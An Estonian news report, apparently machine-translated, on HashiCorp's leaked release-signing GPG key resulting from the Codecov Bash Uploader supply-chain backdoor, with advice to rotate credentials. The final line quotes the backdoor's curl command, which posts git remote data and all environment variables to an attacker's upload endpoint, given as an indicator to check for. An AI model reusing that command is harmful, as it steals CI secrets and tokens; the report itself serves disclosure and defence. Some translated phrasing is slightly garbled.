HashiCorp, kes on tuntud avatud lähtekoodiga tööriistade Vagrant, Packer, Nomad ja Terraform arendajana, teatas väljalaske kontrollimiseks kasutatava digitaalallkirja loomiseks kasutatava privaatse GPG-võtme lekkest. Ründajad, kes said juurdepääsu GPG-võtmele, võivad HashiCorpi toodetes varjatud muudatusi teha, kinnitades need õige digitaalallkirjaga. Samas teatas ettevõte, et auditi käigus ei tuvastatud jälgi selliste muudatuste tegemise katsetest.
Praegu on kahjustatud GPG-võti tühistatud ja selle asemele on kasutusele võetud uus võti. Probleem puudutas ainult kinnitamist SHA256SUM ja SHA256SUM.sig failide abil ega mõjutanud Linuxi DEB- ja RPM-pakettide jaoks digiallkirjade genereerimist saidi releases.hashicorp.com jaoks ega ka macOS-i ja Windowsi versioonide kinnitusmehhanisme (AuthentiCode) .
Leke tekkis tänu Codecov Bash Uploaderi (codecov-bash) skripti kasutamisele infrastruktuuris, mis on mõeldud pideva integratsioonisüsteemide katvusaruannete allalaadimiseks. Codecovi ettevõtte rünnaku ajal peideti määratud skripti sisse tagauks, mille kaudu saadeti ründajate serverisse paroolid ja krüpteerimisvõtmed.
Häkkimiseks kasutasid ründajad Codecov Dockeri kujutise loomisel tekkinud viga, mis võimaldas neil hankida GCS-i (Google Cloud Storage) juurdepääsuandmed, mis on vajalikud saidilt codecov.io levitatavas Bash Uploaderi skriptis muudatuste tegemiseks. veebisait. Muudatused tehti 31. jaanuaril, need jäid kaheks kuuks avastamata ja võimaldasid ründajatel hankida klientide pideva integreerimise süsteemikeskkondadesse salvestatud teavet. Lisatud pahatahtliku koodi abil võivad ründajad hankida teavet testitud Giti hoidla ja kõigi keskkonnamuutujate kohta, sealhulgas žetoonide, krüpteerimisvõtmete ja paroolide kohta, mis edastatakse pidevatele integratsioonisüsteemidele, et korraldada juurdepääs rakenduse koodile, hoidlatele ja teenustele, nagu Amazon Web Services ja GitHub.
Lisaks otsekõnele kasutati Codecov Bash Uploaderi skripti osana teistest üleslaadijatest, nagu Codecov-action (Github), Codecov-circleci-orb ja Codecov-bitrise-step, mille kasutajaid samuti probleem puudutab. Kõigil Codecov-bashi ja sellega seotud toodete kasutajatel soovitatakse oma infrastruktuure auditeerida, samuti paroole ja krüpteerimisvõtmeid muuta. Saate kontrollida tagaukse olemasolu skriptis rea curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || tõsi
Allikas: opennet.ru